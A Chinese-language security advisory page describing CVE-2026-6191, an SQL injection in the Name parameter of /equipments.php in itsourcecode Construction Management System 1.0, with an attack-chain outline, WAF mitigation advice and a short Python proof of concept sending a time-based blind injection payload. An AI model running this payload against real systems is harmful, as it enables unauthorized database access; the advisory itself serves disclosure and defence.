IPBUF安全漏洞报告
English
CVE-2026-6191 CVSS 6.3 中危

CVE-2026-6191: itsourcecode建筑管理系统SQL注入漏洞

披露日期: 2026-04-13

漏洞信息

漏洞编号
CVE-2026-6191
漏洞类型
SQL注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
itsourcecode Construction Management System

相关标签

SQL注入CVE-2026-6191itsourcecode建筑管理系统Web安全中危漏洞

漏洞概述

itSourceCode建筑管理系统1.0版本存在严重的SQL注入漏洞。该漏洞位于/equipments.php文件中,由于系统对用户输入的Name参数缺乏有效的安全过滤,导致远程攻击者可以构造恶意SQL语句并执行。成功利用此漏洞可能导致敏感数据库信息泄露、数据完整性受损,甚至可能获取服务器控制权,建议立即采取补救措施。

技术细节

该漏洞属于典型的SQL注入漏洞,根源在于应用程序未对用户输入进行严格的类型检查和过滤。在itSourceCode建筑管理系统1.0的/equipments.php文件中,系统直接获取HTTP请求中的“Name”参数,并将其拼接到后端SQL查询语句中执行,缺乏预编译处理或有效的转义机制。攻击者可以通过构造特制的HTTP请求,在Name参数中注入恶意的SQL语法(如UNION SELECT、布尔盲注或基于时间的盲注语句)。由于CVSS评分为6.3,攻击复杂度低且无需用户交互,未经授权的远程攻击者可利用此漏洞读取数据库中的敏感信息(如用户密码哈希)、修改数据或破坏数据完整性,严重威胁系统安全。

攻击链分析

STEP 1
侦察
攻击者识别目标运行的是itSourceCode建筑管理系统1.0版本。
STEP 2
漏洞探测
攻击者分析/equipments.php接口,发现Name参数直接参与数据库查询且未经过滤。
STEP 3
漏洞利用
攻击者构造包含恶意SQL代码的POST请求发送至/equipments.php,利用Name参数进行注入。
STEP 4
数据窃取
数据库执行恶意语句,返回敏感信息(如管理员密码、用户数据)或执行写入操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_sqli(target_url): """ PoC for CVE-2026-6191 SQL Injection in /equipments.php Vulnerable parameter: Name """ # Target endpoint full_url = f"{target_url}/equipments.php" # Payload for time-based blind SQL injection # Adjust sleep time based on network latency payload = { "Name": "test' AND (SELECT SLEEP(5))-- -" } try: print(f"[*] Sending request to {full_url}...") response = requests.post(full_url, data=payload, timeout=10) # Check if response time indicates successful injection if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! The application responded with a delay.") print(f"[+] Response time: {response.elapsed.total_seconds()} seconds") else: print("[-] Vulnerability not detected or payload failed.") print(f"[-] Response time: {response.elapsed.total_seconds()} seconds") except requests.exceptions.RequestException as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with actual target URL target = "http://127.0.0.1" check_sqli(target)

影响范围

itsourcecode Construction Management System 1.0

防御指南

临时缓解措施
建议用户立即停止使用受影响的版本,并等待官方发布安全补丁。在无法立即升级的情况下,应在Web服务器前端部署WAF规则,针对/equipments.php接口的Name参数进行严格的流量清洗,拦截包含单引号、UNION、SELECT等关键字的请求,以降低被攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表